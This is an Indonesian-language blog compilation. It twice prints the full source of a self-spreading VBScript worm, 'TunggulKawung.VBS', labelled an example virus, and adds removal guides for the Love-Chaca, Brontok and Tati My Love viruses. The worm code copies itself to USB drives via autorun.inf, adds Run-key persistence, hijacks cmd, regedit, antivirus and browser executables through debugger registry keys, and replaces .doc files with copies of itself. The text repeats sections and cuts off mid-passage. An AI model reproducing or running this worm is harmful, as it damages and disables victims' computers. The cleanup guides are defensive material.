Source Code TunggulKawung.VBS
Neeh Scriptnya yang banyak persamaan dari script worm lainnya:
‘ 982
‘——————————————————————–
‘ Contoh Virus Visual Basic Script
‘ Nama Virus : TunggulKawung.VBS-1
‘——————————————————————–
on error resume next
Dim winpath, sispath, tempath, FlashDisk, fso, wsshell, nask, autorn, filekor
Dim Drives, Drive, cekdrive, tekvir, text, Buatfile, namafile, filetext
Dim DesPath1, DesPath2, Scut1, Scut2
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set wsshell = CreateObject(“WScript.Shell”)
Set filetext = fso.OpenTextFile(WScript.ScriptFullName,1)
namafile = “Tunggul.vbs”
autorn = “[autorun]“&vbcrlf&”shellexecute=wscript.exe ” & namafile
Set nask = fso.getfile(Wscript.ScriptFullname)
cekdrive = nask.drive.drivetype
Set winpath = fso.GetSpecialFolder(0)
Set sispath = fso.GetSpecialFolder(1)
Set tempath = fso.GetSpecialFolder(2)
Set text = nask.openastextstream(1, -2)
Randomize Timer
Aka=Int(rnd*1000)
Akb=Int(rnd*30)
If Akb=0 Then Akb=10
Tamb=String(Akb,”-”)
tekavir = text.readline
tekvir=”‘ “&Aka&Tamb&vbCrLf
Do While Not text.atendofstream
tekvir = tekvir&text.readline
tekvir = tekvir&vbCrLf
Loop
Shortcut()
sudah=0
Do
Set filekor = fso.getfile(winpath & “\” & namafile)
filekor.Attributes = 32
Set filekor = fso.createtextfile(winpath & “\” & namafile, 2, True)
filekor.write tekvir
filekor.Close
Set filekor = fso.getfile(winpath & “\” & namafile)
filekor.Attributes = 39
For Each FlashDisk In fso.drives
If (FlashDisk.drivetype = 1 Or FlashDisk.drivetype = 2) And FlashDisk.Path <> “A:” Then
Set filekor = fso.getfile(FlashDisk.Path & “\” & namafile)
filekor.Attributes = 32
Set filekor = fso.createtextfile(FlashDisk.Path & “\” & namafile, 2, True)
filekor.write tekvir
filekor.Close
Set filekor = fso.getfile(FlashDisk.Path & “\” & namafile)
filekor.Attributes = 39
Set filekor = fso.getfile(FlashDisk.Path & “\autorun.inf”)
filekor.Attributes = 32
Set filekor = fso.createtextfile(FlashDisk.Path & “\autorun.inf”, 2, True)
filekor.write autorn
filekor.Close
Set filekor = fso.getfile(FlashDisk.Path & “\autorun.inf”)
filekor.Attributes = 39
End If
Next
rdw=”REG_DWORD”
Smwc = “\Software\Microsoft\Windows\CurrentVersion\”
Hsmwci = “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\”
wsshell.regwrite “HKLM”&Smwc&”Run\WinSystem”, “wscript.exe ” & winpath & “\” & namafile
wsshell.regwrite Hsmwci&”cmd.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”msconfig.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”regedit.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV-CLN.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV-RTP.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV-SE.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”VB6.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”autorun.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”ansav.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”viremoval.exeDebugger”,” “
wsshell.regwrite Hsmwci&”avscan.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”avgnt.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”iexplore.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”firefox.exe\Debugger”,” “
wsshell.regwrite “HKLM”&Smwc&”Run\WinSystem”, “wscript.exe ” & winpath & “\” & namafile
wsshell.RegWrite “HKCU”&Smwc&”Policies\Explorer\NoFind”, “1″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\Explorer\NoFolderOptions”, “1″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\Explorer\NoRun”, “1″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\System\DisableRegistryTools”, “0″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\System\DisableTaskMgr”, “0″, rdw
wsshell.regwrite “HKCR\vbsfile\DefaultIcon”, “shell32.dll,2″
If Minute(Now)=1 and sudah<>1 Then
Tularifiledoc()
sudah=1
End If
If cekdrive <> 1 Then Wscript.sleep 100000
Loop While cekdrive <> 1
Sub Tularifiledoc()
Set Drives=fso.drives
For Each Drive In Drives
If Drive<>”A:” Then
If Drive.IsReady Then
Cari Drive & “\”
End If
End If
Next
End sub
Sub Shortcut()
DesPath1 = wsshell.SpecialFolders(“Desktop”)
DesPath2 = wsshell.SpecialFolders(“StartUp”)
Set Scut1 = wsshell.CreateShortcut(DesPath1 & “\Harry Potter.lnk”)
Set Scut2 = wsshell.CreateShortcut(DesPath2 & “\Bogor Kota Hujan.lnk”)
Set Fileke1 = fso.createtextfile(sispath& “\iexplore.vbs”, 2, True)
Set Fileke2 = fso.createtextfile(tempath& “\Bogor.vbs”, 2, True)
Fileke1.Write tekvir
Fileke1.Close()
Scut1.TargetPath = wsshell.ExpandEnvironmentStrings(sispath&”\iexplore.vbs”)
Scut1.Save
Fileke2.Write tekvir
Fileke2.Close()
Scut2.TargetPath = wsshell.ExpandEnvironmentStrings(tempath&”\Bogor.vbs”)
Scut2.Save
End Sub
Function Cari(Path)
On Error Resume Next
Dim Folder, Subfolder, SubFolders, File, Files, filekor
Set Folder=fso.GetFolder(Path)
Set Files=Folder.Files
For Each File In Files
If fso.GetExtensionName(File.Path)=”doc” Then
namfa=fso.GetBaseName(File.Path)
Set filekor = fso.GetFile(File.Path)
filekor.Attributes = 39
Set Buatfile=fso.CreateTextFile(File.ParentFolder & “\” & namfa & “.vbs”)
Buatfile.Write tekvir
Buatfile.Close()
End If
Next
Set SubFolders=Folder.SubFolders
For Each Subfolder In Subfolders
Cari Subfolder.Path
Next
End Function
Virus Bonek atau Love-chaca memalsukan diri sebagai file gambar JPEG dengan nama ‘bunga cita lestari’. Vaksincom mendeteksi virus ini sebagai W32/SillyFDC.F, dengan ukuran file 122 KB dan ekstensi .exe.
Love-chaca sulit untuk dimatikan baik dalam kondisi normal, safe mode maupun safe mode with command prompt. Karena sulitnya melakukan pembersihan, maka ada beberapa langkah yang bisa anda pilih untuk membasmi virus tersebut.
Cara 1:
Pengguna komputer yang terkena virus Love-chaca bisa melakukan pembersihan dengan menjadikan drive/harddisk yang terinfeksi menjadi slave. Sebelumnya pengguna bisa me-rename file msvbvm60.dll pada direktory C:\Windows\System32, menjadi file yang diinginkan yang nantinya bisa di-rename kembali seperti semula jika virus sudah terhapus.
Untuk menghapus secara manual file-file virus yang sudah ada, anda bisa menggunakan fitur searching di Windows. Tampilkan terlebih dahulu folder Windows yang di-hidden dengan menggunakan dos command prompt. Caranya:
Gunakan Linux Live CD seperti Knoppix/Ubuntu. Anda bisa melakukan pembersihan virus sama seperti langkah-langkah di atas yaitu dengan mencari file virus yang berukuran file 122 kb, berextension .exe dan bertipe application.
Cara 3:
Gunakan Windows Live CD/Bart PE/Mini PE. Melalui Live CD tersebut kita dapat melakukan pembersihan sekaligus melakukan repair registry yang dibuat oleh virus. Pembersihan virus tersebut tidak jauh berbeda dengan langkah-langkah di atas, hanya saja dapat kita sertai dengan repair registry yang telah dibuat oleh virus (seperti halnya membuka registry editor melalui Windows).
String yang perlu kita ubah yaitu pada :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\winlogon
Userinit = C:\windows\system32\userinit.exe
Shell = explorer.exe
System =
Ubah string registry yang terinfeksi menjadi string registry seperti diatas. Jika sudah diubah, maka restart komputer anda, dan bisa melakukan booting melalui harddisk anda yang sudah dibersihkan dan di-repair registry-nya.
Kemudian lakukan repair registry kembali untuk mengembalikan setingan windows menjadi normal. Salin script di bawah ini dengan program notepad, kemudian save as dengan nama repair.vbs (ubah save as type menjadi all types). Kemudian jalankan dengan dobel klik file tersebut.
Jika komputer anda menggunakan Windows NT/2000, ubah script berikut:
oWSH.Regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit”,”C:\Windows\system32\userinit.exe,”
Menjadi
oWSH.Regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit”,”C:\Winnt\system32\userinit.exe,”
Cara 4:
Hapus alamat URL yang sudah dibuat oleh W32/SillyFDC.F pada Host file Windows [C:\Windows\System32\Drivers\Etc\Host]. Untuk mempermudah proses penghapusan, anda dapat menggunakan tools “HOSTER”. Tools ini dapat di-download di alamat http://www.funkytoad.com/download/HostsXpert.zip.
Jalankan tools tersebut dan hapus alamat url yang ada dengan klik tombol “Restore Microsoft Original Host File” untuk restore Host file tersebut ke Host file asli tanpa harus memilih satu persatu alamat url yang akan dihapus.Disarankan juga untuk rajin men-scan komputer dan meng-update anti virus dengan update terbaru.
virus ini sulit untuk dimatikan baik dalam kondisi normal, safe mode maupun safe mode with command prompt. Selain itu, virus ini dapat menghapus file executable (.exe) yang dianggap dapat membahayakan dirinya, khususnya bagi yang sudah terinfeksi dan berusaha untuk mematikan proses virus tersebut.
Virus ini menyebar melalui media USB Flash, dengan mengandalkan system autoplay windows. Menurut Vaksincom, file virus ini berukuran sekitar 122 KB dengan tipe file application (.exe). Jika dijalankan, maka virus akan membuat sebuah file yaitu “school is hell.doc” pada folder My Documents.
Untuk mempertahankan dirinya, Love Chaca juga akan membuat beberapa file virus yang akan dijalankan setiap kali komputer dinyalakan atau komputer di-restart.
Men-Disable Fungsi Windows
Seperti umumnya virus-virus lokal, Love Chaca juga akan menonaktifkan beberapa fungsi windows seperti Hidden Drive USB, Disable Find, Disable Run, Disable Registry Editor, Disable Task Manager, Disable Command Prompt, Disable Control Panel, Disable Explorer Context Menu dan Disable Taskbar Context Menu.
Love Chaca juga akan mengalihkan fungsi program menjadi Notepad. Virus ini juga akan mengalihkan beberapa fungsi dari program aplikasi dan windows termasuk Registry Editor dan Task Manager.
Salah satu yang diubah oleh Love Chaca juga termasuk tampilan folder option dan properties dari sistem. Jika terinfeksi, maka system properties akan ditambahkan gambar berupa gambar seorang laki-laki memakai jas dan topi yang wajahnya ditutupi buah.
Virus ini pun akan mencoba memblokir beberapa situs keamanan ternama, diantaranya vaksin.com, avast.com, mcafee.com, grisoft.com, symantec.com, secunia.com, f-secure.com, kaspersky.com, friendster.com, yahoo.com, google.com, google.co.id.
Bahkan, saat korban akan membuka browser Internet Explorer, maka akan muncul peringatan seolah-olah komputer kita akan di format.
Virus ini bertipe worm (dapat menduplikasi diri), dan menyebar melalui attachment email (email virus). Nama lain virus: brorontok, Rontokbro,..
Virus ini kira2 pertama kali menyebar di bulan September 2005, dibuat oleh
orang Indonesia karena signature email nya berbahasa Indonesia
dan juga saya melihat isi virus dalam binari dan dan menemukan
nama-nama fungsi dalam kode ascii merupakan kata-kata bahasa Indonesia
seperti keluarDOng(), dsb…
Alasan saya menulis artikel ini adalah karena banyaknya teman-teman
saya yang terkena virus ini
==========================================================
Langkah-langkah membersihkan komputer dari virus Barontok:
==========================================================
(Untuk win 95, 98, ME)
- Masuk ke safe mode: Reboot lalu setelahh muncul tampilan bios
tekan Ctrl, pilih Safe mode dan tekan enter
- Lanjut langsung mulai dari langkah 5
(Untuk windows ME dan XP)
Matikan System Restore Windows
Start->Settings->Control panel->System atau
Start->Control PAnel->System
pada System restore tab… pilih opsi “Turn off System Restore”
(Untuk Win 2000, XP Home/Pro, Server 2003)
1. Reboot dan masuk ke safe mode.
** Restart windows, setelah muncul tampilan BIOS tekan F8, akan ad
pilihan: Safe mode, Normal,…. pilih safe mode lalu tekan enter
2. Setelah itu masuk windows dengan login administrator atau user lain yang
mempunyai auth sebagai administrator,
3. Buat User account baru DENGAN account type: Computer Administrator
lalu logoff dan login dengan account yang baru dibuat.
——————————————
Menghilangkan autostart virus di registry
——————————————
4. Buka regedit: Start menu->Run->Regedit.exe lalu tekan enter
Di panel kiri pilih key:
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Run
lalu di panel kanan, hapus key:
Bron-Spizaetus = “……..”
Di panel kiri pilih key:
HKEY_CURRENT_USER>Software>Microsoft>Windows>CurrentVersion>Run
lalu di panel kanan, hapus key:
Tok-Cirrhatus = “……”
** Catatan:
Jika regedit tidak dapat dibuka (muncul pesan error).. ini merupakan
salah satu akibat virus barontok.
Untuk itu saya telah membuat file untuk mengatasi masalah tsb:
Download file PatchRegKey.inf (600 Bytes) di :
http://students.if.itb.ac.id/~if12031/kios/PatchRegKey.inf
Setelah di download, klik kanan file tsb lalu pilih “Install..”
lalu lanjutkan langkah 4.
————————————————
Menghilangkan autostart virus di scheduled task
————————————————
5. Buka Secheduled Task di Control Panel:
Start->Settings->Control Panel->Scheduled Task lalu tekan enter
Hapus task dengan nama “At1″ atau apapun yang berhubungan dengan virus.
Tips: Klik kanan task->properties, lalu lihat isi properties dan jika
ad isi command yang mencurigakan contoh: BArontok.com , dsb.. hapus
task tersebut.
———————————————————
Cari dan Hapus file-file virus di seluruh drive komputer
———————————————————
6. Aktifkan opsi Show hidden Files dan Ekstensi:
Start->Settings->Control panel atau
Start->Control Panel
Klik Folder Options dan pada Tab view aktifkan opsi:
1. Show hidden files&Folders
dan matikan opsi
2. Hide Extensions for known file types
3. Hide Protected Operating System
7. Gunakan Search File Windows:
Start->Search lalu tekan enter
Cari di seluruh drive windows yang ad: C,D, ….
pada input Search for files or folders names masukkan:
*.exe
lalu pada search options pilih opsi Range Size-> At most: 81 Kb
dan pada Advanced Options pilih opsi Search system folders,
search hidden files&folders, search subfolders
pilihan lain biarkan kosong
Lalu klik search now..
Pada hasil pencarian di panel kanan hapus semua file yang:
1. berukuran TEPAT 80 kb DAN
2. file nya berekstensi *.exe / *.pif / *.com / *.bat DAN
3. File nya memiliki icon folder/direktori windows
** perhatian: hapus hanya file yang memenuhi SEMUA kondisi di atas
dan BUKAN yang memenuhi salah satu saja.
(File yang sering ditemukan: Barontok.com, ElnorB.exe ,cari file ini)
* Tips: Sort hasil pencarian berdasarkan size untuk memudahkan
penghapusan
* Catatan: Cara ini merupakan cara heuristic berdasarkan pengalaman
dan eksperimen (e.g: ditemukan bahwa virus tsb berukuran 80 Kb),
dipilih untuk pencarian lebih cepat dibandingkan melihat pattern file
satu2 secara manual
** Sorry, i don’t have time to write the removal program now
maybe next time
7. Ulangi langkah ke-7 atas dengan input search file: *.pif, *.com, *.bat
————-
Finishing
————-
8. Jika ada, Hapus semua shortcut virus Startup Menu di
setiap account profile:
C:/Document Settings/nama_profile/Start Menu/Programs/Startup
** Saran: jika memungkinkan misal pada komputer pribadi dan bukan
multi user, hapus user account selain user account
yang dibuat pada langkah 3 di atas (misal:Administrator,…).
9. Reboot dan masuk windows seperti biasa.
Catatan:
Cara ini sudah BERHASIL diterapkan di banyak komputer
(pastikan Anda sudah mengikuti semua langkah di atas)
—
END
—
‘ 982
‘——————————————————————–
‘ Contoh Virus Visual Basic Script
‘ Nama Virus : TunggulKawung.VBS-1
‘——————————————————————–
on error resume next
Dim winpath, sispath, tempath, FlashDisk, fso, wsshell, nask, autorn, filekor
Dim Drives, Drive, cekdrive, tekvir, text, Buatfile, namafile, filetext
Dim DesPath1, DesPath2, Scut1, Scut2
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set wsshell = CreateObject(“WScript.Shell”)
Set filetext = fso.OpenTextFile(WScript.ScriptFullName,1)
namafile = “Tunggul.vbs”
autorn = “[autorun]“&vbcrlf&”shellexecute=wscript.exe ” & namafile
Set nask = fso.getfile(Wscript.ScriptFullname)
cekdrive = nask.drive.drivetype
Set winpath = fso.GetSpecialFolder(0)
Set sispath = fso.GetSpecialFolder(1)
Set tempath = fso.GetSpecialFolder(2)
Set text = nask.openastextstream(1, -2)
Randomize Timer
Aka=Int(rnd*1000)
Akb=Int(rnd*30)
If Akb=0 Then Akb=10
Tamb=String(Akb,”-”)
tekavir = text.readline
tekvir=”‘ “&Aka&Tamb&vbCrLf
Do While Not text.atendofstream
tekvir = tekvir&text.readline
tekvir = tekvir&vbCrLf
Loop
Shortcut()
sudah=0
Do
Set filekor = fso.getfile(winpath & “\” & namafile)
filekor.Attributes = 32
Set filekor = fso.createtextfile(winpath & “\” & namafile, 2, True)
filekor.write tekvir
filekor.Close
Set filekor = fso.getfile(winpath & “\” & namafile)
filekor.Attributes = 39
For Each FlashDisk In fso.drives
If (FlashDisk.drivetype = 1 Or FlashDisk.drivetype = 2) And FlashDisk.Path <> “A:” Then
Set filekor = fso.getfile(FlashDisk.Path & “\” & namafile)
filekor.Attributes = 32
Set filekor = fso.createtextfile(FlashDisk.Path & “\” & namafile, 2, True)
filekor.write tekvir
filekor.Close
Set filekor = fso.getfile(FlashDisk.Path & “\” & namafile)
filekor.Attributes = 39
Set filekor = fso.getfile(FlashDisk.Path & “\autorun.inf”)
filekor.Attributes = 32
Set filekor = fso.createtextfile(FlashDisk.Path & “\autorun.inf”, 2, True)
filekor.write autorn
filekor.Close
Set filekor = fso.getfile(FlashDisk.Path & “\autorun.inf”)
filekor.Attributes = 39
End If
Next
rdw=”REG_DWORD”
Smwc = “\Software\Microsoft\Windows\CurrentVersion\”
Hsmwci = “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\”
wsshell.regwrite “HKLM”&Smwc&”Run\WinSystem”, “wscript.exe ” & winpath & “\” & namafile
wsshell.regwrite Hsmwci&”cmd.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”msconfig.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”regedit.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV-CLN.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV-RTP.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV-SE.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”VB6.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”autorun.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”ansav.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”viremoval.exeDebugger”,” “
wsshell.regwrite Hsmwci&”avscan.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”avgnt.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”iexplore.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”firefox.exe\Debugger”,” “
wsshell.regwrite “HKLM”&Smwc&”Run\WinSystem”, “wscript.exe ” & winpath & “\” & namafile
wsshell.RegWrite “HKCU”&Smwc&”Policies\Explorer\NoFind”, “1″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\Explorer\NoFolderOptions”, “1″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\Explorer\NoRun”, “1″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\System\DisableRegistryTools”, “0″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\System\DisableTaskMgr”, “0″, rdw
wsshell.regwrite “HKCR\vbsfile\DefaultIcon”, “shell32.dll,2″
If Minute(Now)=1 and sudah<>1 Then
Tularifiledoc()
sudah=1
End If
If cekdrive <> 1 Then Wscript.sleep 100000
Loop While cekdrive <> 1
Sub Tularifiledoc()
Set Drives=fso.drives
For Each Drive In Drives
If Drive<>”A:” Then
If Drive.IsReady Then
Cari Drive & “\”
End If
End If
Next
End sub
Sub Shortcut()
DesPath1 = wsshell.SpecialFolders(“Desktop”)
DesPath2 = wsshell.SpecialFolders(“StartUp”)
Set Scut1 = wsshell.CreateShortcut(DesPath1 & “\Harry Potter.lnk”)
Set Scut2 = wsshell.CreateShortcut(DesPath2 & “\Bogor Kota Hujan.lnk”)
Set Fileke1 = fso.createtextfile(sispath& “\iexplore.vbs”, 2, True)
Set Fileke2 = fso.createtextfile(tempath& “\Bogor.vbs”, 2, True)
Fileke1.Write tekvir
Fileke1.Close()
Scut1.TargetPath = wsshell.ExpandEnvironmentStrings(sispath&”\iexplore.vbs”)
Scut1.Save
Fileke2.Write tekvir
Fileke2.Close()
Scut2.TargetPath = wsshell.ExpandEnvironmentStrings(tempath&”\Bogor.vbs”)
Scut2.Save
End Sub
Function Cari(Path)
On Error Resume Next
Dim Folder, Subfolder, SubFolders, File, Files, filekor
Set Folder=fso.GetFolder(Path)
Set Files=Folder.Files
For Each File In Files
If fso.GetExtensionName(File.Path)=”doc” Then
namfa=fso.GetBaseName(File.Path)
Set filekor = fso.GetFile(File.Path)
filekor.Attributes = 39
Set Buatfile=fso.CreateTextFile(File.ParentFolder & “\” & namfa & “.vbs”)
Buatfile.Write tekvir
Buatfile.Close()
End If
Next
Set SubFolders=Folder.SubFolders
For Each Subfolder In Subfolders
Cari Subfolder.Path
Next
End Function
Cara Membersihkan Virus ‘Bunga Citra Lestari’
Cara Membersihkan Virus ‘Bunga Citra Lestari’Virus Bonek atau Love-chaca memalsukan diri sebagai file gambar JPEG dengan nama ‘bunga cita lestari’. Vaksincom mendeteksi virus ini sebagai W32/SillyFDC.F, dengan ukuran file 122 KB dan ekstensi .exe.
Love-chaca sulit untuk dimatikan baik dalam kondisi normal, safe mode maupun safe mode with command prompt. Karena sulitnya melakukan pembersihan, maka ada beberapa langkah yang bisa anda pilih untuk membasmi virus tersebut.
Cara 1:
Pengguna komputer yang terkena virus Love-chaca bisa melakukan pembersihan dengan menjadikan drive/harddisk yang terinfeksi menjadi slave. Sebelumnya pengguna bisa me-rename file msvbvm60.dll pada direktory C:\Windows\System32, menjadi file yang diinginkan yang nantinya bisa di-rename kembali seperti semula jika virus sudah terhapus.
Untuk menghapus secara manual file-file virus yang sudah ada, anda bisa menggunakan fitur searching di Windows. Tampilkan terlebih dahulu folder Windows yang di-hidden dengan menggunakan dos command prompt. Caranya:
- Klik [start], kemudian klik [run]
- Ketik [cmd]
- Pada dos prompt, ketik perintah attrib -s -h /s /d, kemudian tekan enter (sebelumnya pastikan Anda berada pada direktori C:\WINDOWS), contoh C:\WINDOWS>attrib -s -h /s /d
- Untuk mengembalikan file yang disembunyikan di drive lain, lakukan langkah di atas tetapi sebelumnya anda ganti terlebih dahulu lokasi drive yang akan dicek [contoh D:\>attrib -s -h /s /d]
Gunakan Linux Live CD seperti Knoppix/Ubuntu. Anda bisa melakukan pembersihan virus sama seperti langkah-langkah di atas yaitu dengan mencari file virus yang berukuran file 122 kb, berextension .exe dan bertipe application.
Cara 3:
Gunakan Windows Live CD/Bart PE/Mini PE. Melalui Live CD tersebut kita dapat melakukan pembersihan sekaligus melakukan repair registry yang dibuat oleh virus. Pembersihan virus tersebut tidak jauh berbeda dengan langkah-langkah di atas, hanya saja dapat kita sertai dengan repair registry yang telah dibuat oleh virus (seperti halnya membuka registry editor melalui Windows).
String yang perlu kita ubah yaitu pada :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\winlogon
Userinit = C:\windows\system32\userinit.exe
Shell = explorer.exe
System =
Ubah string registry yang terinfeksi menjadi string registry seperti diatas. Jika sudah diubah, maka restart komputer anda, dan bisa melakukan booting melalui harddisk anda yang sudah dibersihkan dan di-repair registry-nya.
Kemudian lakukan repair registry kembali untuk mengembalikan setingan windows menjadi normal. Salin script di bawah ini dengan program notepad, kemudian save as dengan nama repair.vbs (ubah save as type menjadi all types). Kemudian jalankan dengan dobel klik file tersebut.
Jika komputer anda menggunakan Windows NT/2000, ubah script berikut:
oWSH.Regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit”,”C:\Windows\system32\userinit.exe,”
Menjadi
oWSH.Regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit”,”C:\Winnt\system32\userinit.exe,”
Cara 4:
Hapus alamat URL yang sudah dibuat oleh W32/SillyFDC.F pada Host file Windows [C:\Windows\System32\Drivers\Etc\Host]. Untuk mempermudah proses penghapusan, anda dapat menggunakan tools “HOSTER”. Tools ini dapat di-download di alamat http://www.funkytoad.com/download/HostsXpert.zip.
Jalankan tools tersebut dan hapus alamat url yang ada dengan klik tombol “Restore Microsoft Original Host File” untuk restore Host file tersebut ke Host file asli tanpa harus memilih satu persatu alamat url yang akan dihapus.Disarankan juga untuk rajin men-scan komputer dan meng-update anti virus dengan update terbaru.
‘Bikini Bunga Citra Lestari’ Bervirus
Rupanya tak hanya Ari Lasso yang tertarik berduet dengan Bunga Citra Lestari (BCL), para pembuat virus pun menginginkannya. Kalau Ari Lasso berduet dengan BCL menghasilkan lagu yang indah, para pembuat virus berduet dengan BCL untuk menyebarkan virus maut.Bagi pembuat virus, nama BCL dinilai sangat menjual sehingga mereka pun mencatut nama tersebut untuk memancing korbannya menjalankan virus. Jika Anda sering menonton pertandingan sepakbola, tentu sudah familiar dengan kata Bonek (Bondo Nekat), yang identik sebagai sekelompok pendukung sepakbola bermodal nekat dari Surabaya. Saat ini sudah beredar virus Bonek, atau yang lebih dikenal dengan nama Love-Chaca. Virus ini memalsukan diri sebagai file gambar JPEG dengan nama “Bikini Bunga Citra Lestari”. Vaksincom, melalui Norman Virus Control, mendeteksi virus Bonek Love Chaca ini sebagai W32/SillyFDC.F.virus ini sulit untuk dimatikan baik dalam kondisi normal, safe mode maupun safe mode with command prompt. Selain itu, virus ini dapat menghapus file executable (.exe) yang dianggap dapat membahayakan dirinya, khususnya bagi yang sudah terinfeksi dan berusaha untuk mematikan proses virus tersebut.
Virus ini menyebar melalui media USB Flash, dengan mengandalkan system autoplay windows. Menurut Vaksincom, file virus ini berukuran sekitar 122 KB dengan tipe file application (.exe). Jika dijalankan, maka virus akan membuat sebuah file yaitu “school is hell.doc” pada folder My Documents.
Untuk mempertahankan dirinya, Love Chaca juga akan membuat beberapa file virus yang akan dijalankan setiap kali komputer dinyalakan atau komputer di-restart.
Men-Disable Fungsi Windows
Seperti umumnya virus-virus lokal, Love Chaca juga akan menonaktifkan beberapa fungsi windows seperti Hidden Drive USB, Disable Find, Disable Run, Disable Registry Editor, Disable Task Manager, Disable Command Prompt, Disable Control Panel, Disable Explorer Context Menu dan Disable Taskbar Context Menu.
Love Chaca juga akan mengalihkan fungsi program menjadi Notepad. Virus ini juga akan mengalihkan beberapa fungsi dari program aplikasi dan windows termasuk Registry Editor dan Task Manager.
Salah satu yang diubah oleh Love Chaca juga termasuk tampilan folder option dan properties dari sistem. Jika terinfeksi, maka system properties akan ditambahkan gambar berupa gambar seorang laki-laki memakai jas dan topi yang wajahnya ditutupi buah.
Virus ini pun akan mencoba memblokir beberapa situs keamanan ternama, diantaranya vaksin.com, avast.com, mcafee.com, grisoft.com, symantec.com, secunia.com, f-secure.com, kaspersky.com, friendster.com, yahoo.com, google.com, google.co.id.
Bahkan, saat korban akan membuka browser Internet Explorer, maka akan muncul peringatan seolah-olah komputer kita akan di format.
‘Tati My Love’, Ungkapan Rasa untuk Sang Kekasih
Baru beberapa hari saja pengguna komputer dikagetkan oleh keberadaan virus ‘bikini bunga citra lestari’, virus lokal kembali menunjukkan taringnya.Adalah Tati My Love, virus yang menyembunyikan folder/subfolder dan membuat file duplikat di dalam flash disk. Jika Anda menemukan file dengan nama tati.my.love.txt pada flash disk atau tiba-tiba semua folder berubah menjadi berekstensi SCR (Screen Saver), segera cek komputer Anda karena kemungkinan virus sudah menginfeksi komputer. Secara umum, virus berukuran 198 KB ini sebenarnya tidak terlalu jahat karena tidak merusak data. Tati.my.love merupakan virus yang paling banyak menyebar di Indonesia. Sebenarnya Tati sudah menyebar sejak Desember 2007, dan diperkirakan ribuan komputer di Indonesia sudah terinfeksi virus ini. Puncak penyebarannya diperkirakan akan terjadi pada kuartal pertama 2008.
Untuk mengelabui user, virus ini akan menggunakan icon menyerupai Folder dengan ukuran 198 KB. Oleh Norman Virus Control, virus ini terdeteksi sebagai Trojan:W32/Autorun.AQK.
Jika sudah menginfeksi komputer, virus ini akan membuat beberapa file induk dengan nama tati.exe di 2 lokasi yaitu di C:\Windows dan C:\Documents and Settings\All Users\Start Menu\Programs\Startup.
Virus ini juga akan membuat string pada beberapa registry, sehingga jika user mengakses ke Drive maka secara tidak langsung akan menjalankan virus. Untuk varian awalnya, Tati My Love tidak akan melakukan blok terhadap fungsi Windows sehingga lebih mudah untuk dibersihkan.
Memalsukan diri sebagai folder
Perlu diwaspadai juga, jika Anda menemukan folder yang agak aneh di dalam flash disk, seperti folder dengan ekstensi SCR, dengan type “Screensaver” dan ukuran 198 KB, sebaiknya jangan dieksekusi karena virus ini akan melakukan penipuan dengan membuat file duplikat di dalam flash disk tersebut pada setiap folder dan subfolder.
Perlu diketahui, folder yang asli tidak akan memiliki ukuran (size), tipe dan tidak memiliki ekstensi. File duplikat yang dibuat akan mempunyai nama file yang sama dengan nama folder aslinya tetapi mempunyai ekstensi .SCR (screen saver) sedangkan folder asli tersebut akan disembunyikan.
Tati My Love juga akan membuat file Autorun.inf dan file tati.exe pada flash disk dengan tujuan agar virus dapat aktif secara otomatis dengan hanya mencolokkan flash disk tersebut ke komputer. File Autorun.inf ini berisi script untuk menjalankan file tati.exe tersebut.
Tati My Love pun akan membuat sebuah file dengan nama tati.my.love.txt yang berisi ungkapan perasaan kepada sang kekasih dengan bunyi seperti ini:
Duhai Adinda tercinta —-
Perjalanan tiga hari tiga malam mengarungi samudera
——-Seumur hidup diri ini takkan lupa
Untuk mengelabui user, virus ini akan menggunakan icon menyerupai Folder dengan ukuran 198 KB. Oleh Norman Virus Control, virus ini terdeteksi sebagai Trojan:W32/Autorun.AQK.
